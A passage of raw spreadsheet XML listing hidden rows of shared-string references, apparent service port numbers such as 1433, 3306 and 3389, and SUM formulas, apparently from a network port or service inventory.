        <v>20</v>
      </c>
      <c r="E112" s="1">
        <v>500</v>
      </c>
      <c r="F112" t="s">
        <v>136</v>
      </c>
      <c r="G112" t="s">
        <v>216</v>
      </c>
      <c r="I112">
        <f t="shared" si="2"/>
        <v>500</v>
      </c>
    </row>
    <row r="113" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A113" t="s">
        <v>30</v>
      </c>
      <c r="B113" t="s">
        <v>138</v>
      </c>
      <c r="C113" t="s">
        <v>423</v>
      </c>
      <c r="D113" t="s">
        <v>20</v>
      </c>
      <c r="E113" s="1">
        <v>500</v>
      </c>
      <c r="F113" t="s">
        <v>136</v>
      </c>
      <c r="G113" t="s">
        <v>421</v>
      </c>
      <c r="I113">
        <f t="shared" si="2"/>
        <v>500</v>
      </c>
    </row>
    <row r="114" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A114" t="s">
        <v>30</v>
      </c>
      <c r="B114" t="s">
        <v>426</v>
      </c>
      <c r="C114" t="s">
        <v>427</v>
      </c>
      <c r="D114" t="s">
        <v>8</v>
      </c>
      <c r="E114" s="1">
        <v>513</v>
      </c>
      <c r="F114" t="s">
        <v>424</v>
      </c>
      <c r="G114" t="s">
        <v>425</v>
      </c>
      <c r="I114">
        <f t="shared" si="2"/>
        <v>513</v>
      </c>
    </row>
    <row r="115" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A115" t="s">
        <v>68</v>
      </c>
      <c r="B115" t="s">
        <v>161</v>
      </c>
      <c r="C115" t="s">
        <v>171</v>
      </c>
      <c r="D115" t="s">
        <v>8</v>
      </c>
      <c r="E115" s="1">
        <v>514</v>
      </c>
      <c r="F115" t="s">
        <v>170</v>
      </c>
      <c r="G115" t="s">
        <v>169</v>
      </c>
    </row>
    <row r="116" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A116" t="s">
        <v>30</v>
      </c>
      <c r="B116" t="s">
        <v>480</v>
      </c>
      <c r="C116" t="s">
        <v>480</v>
      </c>
      <c r="D116" t="s">
        <v>8</v>
      </c>
      <c r="E116" s="1">
        <v>514</v>
      </c>
      <c r="F116" t="s">
        <v>170</v>
      </c>
      <c r="G116" t="s">
        <v>479</v>
      </c>
    </row>
    <row r="117" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A117" t="s">
        <v>30</v>
      </c>
      <c r="B117" t="s">
        <v>480</v>
      </c>
      <c r="C117" t="s">
        <v>480</v>
      </c>
      <c r="D117" t="s">
        <v>8</v>
      </c>
      <c r="E117" s="1">
        <v>514</v>
      </c>
      <c r="F117" t="s">
        <v>170</v>
      </c>
      <c r="G117" t="s">
        <v>478</v>
      </c>
    </row>
    <row r="118" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A118" t="s">
        <v>68</v>
      </c>
      <c r="B118" t="s">
        <v>43</v>
      </c>
      <c r="C118" t="s">
        <v>623</v>
      </c>
      <c r="D118" t="s">
        <v>8</v>
      </c>
      <c r="E118" s="1">
        <v>1433</v>
      </c>
      <c r="F118" t="s">
        <v>428</v>
      </c>
      <c r="G118" t="s">
        <v>622</v>
      </c>
    </row>
    <row r="119" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A119" t="s">
        <v>30</v>
      </c>
      <c r="B119" t="s">
        <v>10</v>
      </c>
      <c r="C119" t="s">
        <v>412</v>
      </c>
      <c r="D119" t="s">
        <v>8</v>
      </c>
      <c r="E119" s="1">
        <v>1433</v>
      </c>
      <c r="F119" t="s">
        <v>428</v>
      </c>
      <c r="G119" t="s">
        <v>429</v>
      </c>
    </row>
    <row r="120" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A120" t="s">
        <v>30</v>
      </c>
      <c r="B120" t="s">
        <v>10</v>
      </c>
      <c r="C120" t="s">
        <v>532</v>
      </c>
      <c r="D120" t="s">
        <v>8</v>
      </c>
      <c r="E120" s="1">
        <v>1433</v>
      </c>
      <c r="F120" t="s">
        <v>428</v>
      </c>
      <c r="G120" t="s">
        <v>481</v>
      </c>
    </row>
    <row r="121" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A121" t="s">
        <v>30</v>
      </c>
      <c r="B121" t="s">
        <v>43</v>
      </c>
      <c r="C121" t="s">
        <v>620</v>
      </c>
      <c r="D121" t="s">
        <v>8</v>
      </c>
      <c r="E121" s="1">
        <v>1433</v>
      </c>
      <c r="F121" t="s">
        <v>428</v>
      </c>
      <c r="G121" t="s">
        <v>621</v>
      </c>
    </row>
    <row r="122" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A122" t="s">
        <v>68</v>
      </c>
      <c r="B122" t="s">
        <v>10</v>
      </c>
      <c r="C122" t="s">
        <v>413</v>
      </c>
      <c r="D122" t="s">
        <v>8</v>
      </c>
      <c r="E122" s="1">
        <v>1521</v>
      </c>
      <c r="F122" t="s">
        <v>433</v>
      </c>
      <c r="G122" t="s">
        <v>439</v>
      </c>
    </row>
    <row r="123" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A123" t="s">
        <v>68</v>
      </c>
      <c r="B123" t="s">
        <v>446</v>
      </c>
      <c r="C123" t="s">
        <v>443</v>
      </c>
      <c r="D123" t="s">
        <v>8</v>
      </c>
      <c r="E123" s="1">
        <v>1521</v>
      </c>
      <c r="F123" t="s">
        <v>433</v>
      </c>
      <c r="G123" t="s">
        <v>441</v>
      </c>
    </row>
    <row r="124" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A124" t="s">
        <v>68</v>
      </c>
      <c r="B124" t="s">
        <v>446</v>
      </c>
      <c r="C124" t="s">
        <v>444</v>
      </c>
      <c r="D124" t="s">
        <v>8</v>
      </c>
      <c r="E124" s="1">
        <v>1521</v>
      </c>
      <c r="F124" t="s">
        <v>433</v>
      </c>
      <c r="G124" t="s">
        <v>442</v>
      </c>
      <c r="I124">
        <f t="shared" ref="I124:I155" si="3">SUM(E124:H124)</f>
        <v>1521</v>
      </c>
    </row>
    <row r="125" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A125" t="s">
        <v>30</v>
      </c>
      <c r="B125" t="s">
        <v>434</v>
      </c>
      <c r="C125" t="s">
        <v>438</v>
      </c>
      <c r="D125" t="s">
        <v>8</v>
      </c>
      <c r="E125" s="1">
        <v>1521</v>
      </c>
      <c r="F125" t="s">
        <v>433</v>
      </c>
      <c r="G125" t="s">
        <v>430</v>
      </c>
      <c r="I125">
        <f t="shared" si="3"/>
        <v>1521</v>
      </c>
    </row>
    <row r="126" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A126" t="s">
        <v>30</v>
      </c>
      <c r="B126" t="s">
        <v>435</v>
      </c>
      <c r="C126" t="s">
        <v>436</v>
      </c>
      <c r="D126" t="s">
        <v>8</v>
      </c>
      <c r="E126" s="1">
        <v>1521</v>
      </c>
      <c r="F126" t="s">
        <v>433</v>
      </c>
      <c r="G126" t="s">
        <v>431</v>
      </c>
      <c r="I126">
        <f t="shared" si="3"/>
        <v>1521</v>
      </c>
    </row>
    <row r="127" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A127" t="s">
        <v>30</v>
      </c>
      <c r="B127" t="s">
        <v>435</v>
      </c>
      <c r="C127" t="s">
        <v>437</v>
      </c>
      <c r="D127" t="s">
        <v>8</v>
      </c>
      <c r="E127" s="1">
        <v>1521</v>
      </c>
      <c r="F127" t="s">
        <v>433</v>
      </c>
      <c r="G127" t="s">
        <v>432</v>
      </c>
      <c r="I127">
        <f t="shared" si="3"/>
        <v>1521</v>
      </c>
    </row>
    <row r="128" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A128" t="s">
        <v>30</v>
      </c>
      <c r="B128" t="s">
        <v>446</v>
      </c>
      <c r="C128" t="s">
        <v>445</v>
      </c>
      <c r="D128" t="s">
        <v>8</v>
      </c>
      <c r="E128" s="1">
        <v>1521</v>
      </c>
      <c r="F128" t="s">
        <v>433</v>
      </c>
      <c r="G128" t="s">
        <v>440</v>
      </c>
      <c r="I128">
        <f t="shared" si="3"/>
        <v>1521</v>
      </c>
    </row>
    <row r="129" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A129" t="s">
        <v>30</v>
      </c>
      <c r="B129" t="s">
        <v>10</v>
      </c>
      <c r="C129" t="s">
        <v>112</v>
      </c>
      <c r="E129" s="1">
        <v>2049</v>
      </c>
      <c r="F129" t="s">
        <v>111</v>
      </c>
      <c r="G129" s="2" t="s">
        <v>204</v>
      </c>
      <c r="I129">
        <f t="shared" si="3"/>
        <v>2049</v>
      </c>
    </row>
    <row r="130" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A130" t="s">
        <v>30</v>
      </c>
      <c r="B130" t="s">
        <v>159</v>
      </c>
      <c r="C130" t="s">
        <v>160</v>
      </c>
      <c r="E130" s="1">
        <v>2049</v>
      </c>
      <c r="F130" t="s">
        <v>111</v>
      </c>
      <c r="G130" t="s">
        <v>158</v>
      </c>
      <c r="I130">
        <f t="shared" si="3"/>
        <v>2049</v>
      </c>
    </row>
    <row r="131" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A131" t="s">
        <v>30</v>
      </c>
      <c r="B131" t="s">
        <v>159</v>
      </c>
      <c r="C131" t="s">
        <v>447</v>
      </c>
      <c r="E131" s="1">
        <v>2049</v>
      </c>
      <c r="F131" t="s">
        <v>111</v>
      </c>
      <c r="G131" t="s">
        <v>223</v>
      </c>
      <c r="I131">
        <f t="shared" si="3"/>
        <v>2049</v>
      </c>
    </row>
    <row r="132" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A132" t="s">
        <v>30</v>
      </c>
      <c r="B132" t="s">
        <v>159</v>
      </c>
      <c r="C132" t="s">
        <v>225</v>
      </c>
      <c r="E132" s="1">
        <v>2049</v>
      </c>
      <c r="F132" t="s">
        <v>111</v>
      </c>
      <c r="G132" t="s">
        <v>224</v>
      </c>
      <c r="I132">
        <f t="shared" si="3"/>
        <v>2049</v>
      </c>
    </row>
    <row r="133" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A133" t="s">
        <v>30</v>
      </c>
      <c r="B133" t="s">
        <v>449</v>
      </c>
      <c r="C133" t="s">
        <v>450</v>
      </c>
      <c r="E133" s="1">
        <v>2049</v>
      </c>
      <c r="F133" t="s">
        <v>111</v>
      </c>
      <c r="G133" t="s">
        <v>448</v>
      </c>
      <c r="I133">
        <f t="shared" si="3"/>
        <v>2049</v>
      </c>
    </row>
    <row r="134" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A134" t="s">
        <v>30</v>
      </c>
      <c r="B134" t="s">
        <v>10</v>
      </c>
      <c r="C134" t="s">
        <v>484</v>
      </c>
      <c r="D134" t="s">
        <v>8</v>
      </c>
      <c r="E134" s="1">
        <v>3260</v>
      </c>
      <c r="F134" t="s">
        <v>482</v>
      </c>
      <c r="G134" t="s">
        <v>483</v>
      </c>
      <c r="I134">
        <f t="shared" si="3"/>
        <v>3260</v>
      </c>
    </row>
    <row r="135" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A135" t="s">
        <v>70</v>
      </c>
      <c r="B135" t="s">
        <v>454</v>
      </c>
      <c r="C135" t="s">
        <v>455</v>
      </c>
      <c r="D135" t="s">
        <v>8</v>
      </c>
      <c r="E135" s="1">
        <v>3306</v>
      </c>
      <c r="F135" t="s">
        <v>218</v>
      </c>
      <c r="G135" t="s">
        <v>453</v>
      </c>
      <c r="I135">
        <f t="shared" si="3"/>
        <v>3306</v>
      </c>
    </row>
    <row r="136" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A136" t="s">
        <v>30</v>
      </c>
      <c r="B136" t="s">
        <v>10</v>
      </c>
      <c r="C136" t="s">
        <v>219</v>
      </c>
      <c r="D136" t="s">
        <v>8</v>
      </c>
      <c r="E136" s="1">
        <v>3306</v>
      </c>
      <c r="F136" t="s">
        <v>218</v>
      </c>
      <c r="G136" t="s">
        <v>217</v>
      </c>
      <c r="I136">
        <f t="shared" si="3"/>
        <v>3306</v>
      </c>
    </row>
    <row r="137" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A137" t="s">
        <v>30</v>
      </c>
      <c r="B137" t="s">
        <v>10</v>
      </c>
      <c r="C137" t="s">
        <v>452</v>
      </c>
      <c r="D137" t="s">
        <v>8</v>
      </c>
      <c r="E137" s="1">
        <v>3306</v>
      </c>
      <c r="F137" t="s">
        <v>218</v>
      </c>
      <c r="G137" t="s">
        <v>451</v>
      </c>
      <c r="I137">
        <f t="shared" si="3"/>
        <v>3306</v>
      </c>
    </row>
    <row r="138" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A138" t="s">
        <v>68</v>
      </c>
      <c r="B138" t="s">
        <v>267</v>
      </c>
      <c r="C138" t="s">
        <v>462</v>
      </c>
      <c r="D138" t="s">
        <v>8</v>
      </c>
      <c r="E138" s="1">
        <v>3389</v>
      </c>
      <c r="F138" t="s">
        <v>115</v>
      </c>
      <c r="G138" t="s">
        <v>461</v>
      </c>
      <c r="I138">
        <f t="shared" si="3"/>
        <v>3389</v>
      </c>
    </row>
    <row r="139" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A139" t="s">
        <v>68</v>
      </c>
      <c r="B139" t="s">
        <v>465</v>
      </c>
      <c r="C139" t="s">
        <v>464</v>
      </c>
      <c r="D139" t="s">
        <v>8</v>
      </c>
      <c r="E139" s="1">
        <v>3389</v>
      </c>
      <c r="F139" t="s">
        <v>115</v>
      </c>
      <c r="G139" t="s">
        <v>463</v>
      </c>
      <c r="I139">
        <f t="shared" si="3"/>
        <v>3389</v>
      </c>
    </row>
    <row r="140" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A140" t="s">
        <v>30</v>
      </c>
      <c r="B140" t="s">
        <v>114</v>
      </c>
      <c r="C140" t="s">
        <v>113</v>
      </c>
      <c r="D140" t="s">
        <v>8</v>
      </c>
      <c r="E140" s="1">
        <v>3389</v>
      </c>
      <c r="F140" t="s">
        <v>115</v>
      </c>
      <c r="G140" t="s">
        <v>203</v>
      </c>
      <c r="I140">
        <f t="shared" si="3"/>
        <v>3389</v>
      </c>
    </row>
    <row r="141" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A141" t="s">
        <v>30</v>
      </c>
      <c r="B141" t="s">
        <v>10</v>
      </c>
      <c r="C141" t="s">
        <v>116</v>
      </c>
      <c r="D141" t="s">
        <v>8</v>
      </c>
      <c r="E141" s="1">
        <v>3389</v>
      </c>
      <c r="F141" t="s">
        <v>115</v>
      </c>
      <c r="G141" s="2" t="s">
        <v>202</v>
      </c>
      <c r="I141">
        <f t="shared" si="3"/>
        <v>3389</v>
      </c>
    </row>
    <row r="142" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A142" t="s">
        <v>30</v>
      </c>
      <c r="B142" t="s">
        <v>458</v>
      </c>
      <c r="C142" t="s">
        <v>457</v>
      </c>
      <c r="D142" t="s">
        <v>8</v>
      </c>
      <c r="E142" s="1">
        <v>3389</v>
      </c>
      <c r="F142" t="s">
        <v>115</v>
      </c>
      <c r="G142" t="s">
        <v>456</v>
      </c>
      <c r="I142">
        <f t="shared" si="3"/>
        <v>3389</v>
      </c>
    </row>
    <row r="143" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A143" t="s">
        <v>30</v>
      </c>
      <c r="B143" t="s">
        <v>458</v>
      </c>
      <c r="C143" t="s">
        <v>460</v>
      </c>
      <c r="D143" t="s">
        <v>8</v>
      </c>
      <c r="E143" s="1">
        <v>3389</v>
      </c>
      <c r="F143" t="s">
        <v>115</v>
      </c>
      <c r="G143" t="s">
        <v>459</v>
      </c>
      <c r="I143">
        <f t="shared" si="3"/>
        <v>3389</v>
      </c>
    </row>
    <row r="144" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A144" t="s">
        <v>30</v>
      </c>
      <c r="B144" t="s">
        <v>485</v>
      </c>
      <c r="C144" t="s">
        <v>577</v>
      </c>
      <c r="D144" t="s">
        <v>8</v>
      </c>
      <c r="E144" s="1">
        <v>3389</v>
      </c>
      <c r="F144" t="s">
        <v>115</v>
      </c>
      <c r="G144" s="2" t="s">
        <v>576</v>
      </c>
      <c r="I144">
        <f t="shared" si="3"/>
        <v>3389</v>
      </c>
    </row>
    <row r="145" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A145" t="s">
        <v>30</v>
      </c>
      <c r="B145" t="s">
        <v>602</v>
      </c>
      <c r="C145" t="s">
        <v>603</v>
      </c>
      <c r="D145" t="s">
        <v>8</v>
      </c>
      <c r="E145" s="1">
        <v>3389</v>
      </c>
      <c r="F145" t="s">
        <v>115</v>
      </c>
      <c r="G145" t="s">
        <v>601</v>
      </c>
      <c r="I145">
        <f t="shared" si="3"/>
        <v>3389</v>
      </c>
    </row>
    <row r="146" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A146" t="s">
        <v>68</v>
      </c>
      <c r="B146" t="s">
        <v>43</v>
      </c>
      <c r="C146" t="s">
        <v>619</v>
      </c>
      <c r="D146" t="s">
        <v>8</v>
      </c>
      <c r="E146" s="1">
        <v>5432</v>
      </c>
      <c r="F146" t="s">
        <v>467</v>
      </c>
      <c r="G146" t="s">
        <v>618</v>
      </c>
      <c r="I146">
        <f t="shared" si="3"/>
        <v>5432</v>
      </c>
    </row>
    <row r="147" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A147" t="s">
        <v>70</v>
      </c>
      <c r="B147" t="s">
        <v>469</v>
      </c>
      <c r="C147" t="s">
        <v>468</v>
      </c>
      <c r="D147" t="s">
        <v>8</v>
      </c>
      <c r="E147" s="1">
        <v>5432</v>
      </c>
      <c r="F147" t="s">
        <v>467</v>
      </c>
      <c r="G147" t="s">
        <v>466</v>
      </c>
      <c r="I147">
        <f t="shared" si="3"/>
        <v>5432</v>
      </c>
    </row>
    <row r="148" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A148" t="s">
        <v>30</v>
      </c>
      <c r="B148" t="s">
        <v>43</v>
      </c>
      <c r="C148" t="s">
        <v>616</v>
      </c>
      <c r="D148" t="s">
        <v>8</v>
      </c>
      <c r="E148" s="1">
        <v>5432</v>
      </c>
      <c r="F148" t="s">
        <v>467</v>
      </c>
      <c r="G148" t="s">
        <v>617</v>
      </c>
      <c r="I148">
        <f t="shared" si="3"/>
        <v>5432</v>
      </c>
    </row>
    <row r="149" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A149" t="s">
        <v>68</v>
      </c>
      <c r="B149" t="s">
        <v>10</v>
      </c>
      <c r="C149" t="s">
        <v>471</v>
      </c>
      <c r="D149" t="s">
        <v>8</v>
      </c>
      <c r="E149" s="1">
        <v>5900</v>
      </c>
      <c r="F149" t="s">
        <v>470</v>
      </c>
      <c r="G149" t="s">
        <v>628</v>
      </c>
      <c r="I149">
        <f t="shared" si="3"/>
        <v>5900</v>
      </c>
    </row>
    <row r="150" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A150" t="s">
        <v>70</v>
      </c>
      <c r="B150" t="s">
        <v>475</v>
      </c>
      <c r="C150" t="s">
        <v>474</v>
      </c>
      <c r="D150" t="s">
        <v>8</v>
      </c>
      <c r="E150" s="1">
        <v>5985</v>
      </c>
      <c r="F150" t="s">
        <v>472</v>
      </c>
      <c r="G150" t="s">
        <v>473</v>
      </c>
      <c r="I150">
        <f t="shared" si="3"/>
        <v>5985</v>
      </c>
    </row>
    <row r="151" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A151" t="s">
        <v>70</v>
      </c>
      <c r="B151" t="s">
        <v>475</v>
      </c>
      <c r="C151" t="s">
        <v>477</v>
      </c>
      <c r="D151" t="s">
        <v>8</v>
      </c>
      <c r="E151" s="1">
        <v>5985</v>
      </c>
      <c r="F151" t="s">
        <v>472</v>
      </c>
      <c r="G151" t="s">
        <v>476</v>
      </c>
      <c r="I151">
        <f t="shared" si="3"/>
        <v>5985</v>
      </c>
    </row>
    <row r="152" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A152" t="s">
        <v>30</v>
      </c>
      <c r="B152" t="s">
        <v>10</v>
      </c>
      <c r="C152" t="s">
        <v>488</v>
      </c>
      <c r="D152" t="s">
        <v>8</v>
      </c>
      <c r="E152" s="1">
        <v>6000</v>
      </c>
      <c r="F152" t="s">
        <v>486</v>
      </c>
      <c r="G152" t="s">
        <v>487</v>
      </c>
      <c r="I152">
        <f t="shared" si="3"/>
        <v>6000</v>
      </c>
    </row>
    <row r="153" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A153" t="s">
        <v>539</v>
      </c>
      <c r="B153" t="s">
        <v>541</v>
      </c>
      <c r="C153" t="s">
        <v>540</v>
      </c>
      <c r="D153" s="1" t="s">
        <v>19</v>
      </c>
      <c r="E153" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F153" s="1" t="s">
        <v>19</v>
      </c>
      <c r="G153" t="s">
        <v>542</v>
      </c>
      <c r="I153">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="154" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A154" t="s">
        <v>589</v>
      </c>
      <c r="B154" t="s">
        <v>582</v>
      </c>
      <c r="C154" t="s">
        <v>586</v>
      </c>
      <c r="D154" t="s">
        <v>19</v>
      </c>
      <c r="E154" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F154" t="s">
        <v>19</v>
      </c>
      <c r="G154" t="s">
        <v>583</v>
      </c>
      <c r="I154">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="155" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A155" t="s">
        <v>589</v>
      </c>
      <c r="B155" t="s">
        <v>582</v>
      </c>
      <c r="C155" t="s">
        <v>584</v>
      </c>
      <c r="D155" t="s">
        <v>19</v>
      </c>
      <c r="E155" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F155" t="s">
        <v>19</v>
      </c>
      <c r="G155" t="s">
        <v>585</v>
      </c>
      <c r="I155">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="156" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A156" t="s">
        <v>589</v>
      </c>
      <c r="B156" t="s">
        <v>582</v>
      </c>
      <c r="C156" t="s">
        <v>588</v>
      </c>
      <c r="D156" t="s">
        <v>19</v>
      </c>
      <c r="E156" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F156" t="s">
        <v>19</v>
      </c>
      <c r="G156" t="s">
        <v>587</v>
      </c>
      <c r="I156">
        <f t="shared" ref="I156:I187" si="4">SUM(E156:H156)</f>
        <v>0</v>
      </c>
    </row>
    <row r="157" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A157" t="s">
        <v>68</v>
      </c>
      <c r="B157" t="s">
        <v>27</v>
      </c>
      <c r="C157" t="s">
        <v>612</v>
      </c>
      <c r="D157" t="s">
        <v>19</v>
      </c>
      <c r="E157" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F157" t="s">
        <v>19</v>
      </c>
      <c r="G157" t="s">
        <v>28</v>
      </c>
      <c r="I157">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="158" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A158" t="s">
        <v>68</v>
      </c>
      <c r="B158" t="s">
        <v>27</v>
      </c>
      <c r="D158" t="s">
        <v>19</v>
      </c>
      <c r="E158" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F158" t="s">
        <v>19</v>
      </c>
      <c r="G158" t="s">
        <v>29</v>
      </c>
      <c r="I158">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="159" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A159" t="s">
        <v>91</v>
      </c>
      <c r="B159" t="s">
        <v>88</v>
      </c>
      <c r="C159" t="s">
        <v>89</v>
      </c>
      <c r="D159" t="s">
        <v>19</v>
      </c>
      <c r="E159" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F159" t="s">
        <v>19</v>
      </c>
      <c r="G159" t="s">
        <v>90</v>
      </c>
      <c r="I159">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="160" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A160" t="s">
        <v>70</v>
      </c>
      <c r="B160" t="s">
        <v>181</v>
      </c>
      <c r="C160" t="s">
        <v>182</v>
      </c>
      <c r="D160" t="s">
        <v>8</v>
      </c>
      <c r="E160" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F160" t="s">
        <v>19</v>
      </c>
      <c r="G160" t="s">
        <v>257</v>
      </c>
      <c r="I160">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="161" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A161" t="s">
        <v>6</v>
      </c>
      <c r="B161" t="s">
        <v>7</v>
      </c>
      <c r="C161" t="s">
        <v>16</v>
      </c>
      <c r="D161" t="s">
        <v>60</v>
      </c>
      <c r="E161" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F161" t="s">
        <v>19</v>
      </c>
      <c r="G161" t="s">
        <v>240</v>
      </c>
      <c r="I161">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="162" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A162" t="s">
        <v>6</v>
      </c>
      <c r="B162" t="s">
        <v>7</v>
      </c>
      <c r="C162" t="s">
        <v>17</v>
      </c>
      <c r="D162" t="s">
        <v>60</v>
      </c>
      <c r="E162" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F162" t="s">
        <v>19</v>
      </c>
      <c r="G162" t="s">
        <v>18</v>
      </c>
      <c r="I162">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="163" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A163" t="s">
        <v>6</v>
      </c>
      <c r="B163" t="s">
        <v>58</v>
      </c>
      <c r="C163" t="s">
        <v>59</v>
      </c>
      <c r="D163" t="s">
        <v>57</v>
      </c>
      <c r="E163" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F163" t="s">
        <v>19</v>
      </c>
      <c r="G163" t="s">
        <v>241</v>
      </c>
      <c r="I163">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="164" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A164" t="s">
        <v>6</v>
      </c>
      <c r="B164" t="s">
        <v>58</v>
      </c>
      <c r="C164" t="s">
        <v>97</v>
      </c>
      <c r="D164" t="s">
        <v>57</v>
      </c>
      <c r="E164" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F164" t="s">
        <v>19</v>
      </c>
      <c r="G164" t="s">
        <v>207</v>
      </c>
      <c r="I164">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="165" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A165" t="s">
        <v>6</v>
      </c>
      <c r="B165" t="s">
        <v>10</v>
      </c>
      <c r="C165" t="s">
        <v>671</v>
      </c>
      <c r="D165" t="s">
        <v>19</v>
      </c>
      <c r="E165" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F165" t="s">
        <v>19</v>
      </c>
      <c r="G165" t="s">
        <v>87</v>
      </c>
      <c r="I165">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="166" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A166" t="s">
        <v>6</v>
      </c>
      <c r="B166" t="s">
        <v>10</v>
      </c>
      <c r="C166" t="s">
        <v>672</v>
      </c>
      <c r="D166" t="s">
        <v>19</v>
      </c>
      <c r="E166" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F166" t="s">
        <v>19</v>
      </c>
      <c r="G166" t="s">
        <v>600</v>
      </c>
      <c r="I166">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="167" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A167" t="s">
        <v>6</v>
      </c>
      <c r="B167" t="s">
        <v>10</v>
      </c>
      <c r="C167" t="s">
        <v>98</v>
      </c>
      <c r="D167" t="s">
        <v>57</v>
      </c>
      <c r="E167" s="1" t="s">
        <v>19</v>
      </c>
      <c r="F167" s="1" t="s">
        <v>19</v>
      </c>
      <c r="G167" t="s">
        <v>556</v>
      </c>
      <c r="I167">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="168" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A168" t="s">
        <v>494</v>
      </c>
      <c r="B168" t="s">
        <v>493</v>
      </c>
      <c r="C168" t="s">
        <v>495</v>
      </c>
      <c r="D168" t="s">
        <v>19</v>
      </c>
      <c r="E168" t="s">
        <v>19</v>
      </c>
      <c r="F168" t="s">
        <v>19</v>
      </c>
      <c r="G168" t="s">
        <v>497</v>
      </c>
      <c r="I168">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
    </row>
    <row r="169" spans="1:9" hidden="1" x14ac:dyDescent="0.25">
      <c r="A169" t="s">
        <v>494</v>
      </c>
      <c r="B169" t="s">
        <v>493</v>
      </c>
      <c r="C169" t="s">
        <v>496</v>
      </c>
      <c r="D169" t="s">
        <v>19</v>
      </c>
      <c r="E169" t="s">
        <v>19</v>
